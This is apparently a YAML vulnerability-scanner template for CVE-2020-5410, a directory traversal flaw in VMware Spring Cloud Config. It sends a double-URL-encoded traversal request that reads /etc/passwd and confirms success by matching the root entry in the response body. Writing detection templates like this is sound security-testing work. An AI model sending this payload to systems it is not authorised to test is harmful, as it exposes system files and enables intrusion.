id: yaml-poc-vmware-spring_cloud_config-directory_traversal-CVE-2020-5410
info:
  name: Yaml Poc Vmware Spring_Cloud_Config Directory_Traversal Cve 2020 5410
  author: converted
  severity: high
  description: 'Converted from xpoc: yaml-poc-vmware-spring_cloud_config-directory_traversal-CVE-2020-5410'
  tags: spring,vmware,traversal,cve
  classification:
    cve-id: CVE-2020-5410
  reference:
  - http://www.nsfocus.net/vulndb/46848
  - https://nvd.nist.gov/vuln/detail/CVE-2020-5410
  - https://tanzu.vmware.com/security/cve-2020-5410
  - https://www.auscert.org.au/bulletins/ESB-2021.2731
http:
- method: GET
  path:
  - /..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252Fetc%252Fpasswd%23/a
  matchers-condition: and
  matchers:
  - type: status
    status:
    - 200
  - type: regex
    part: body
    regex:
    - 'root:[x*]:0:0:'
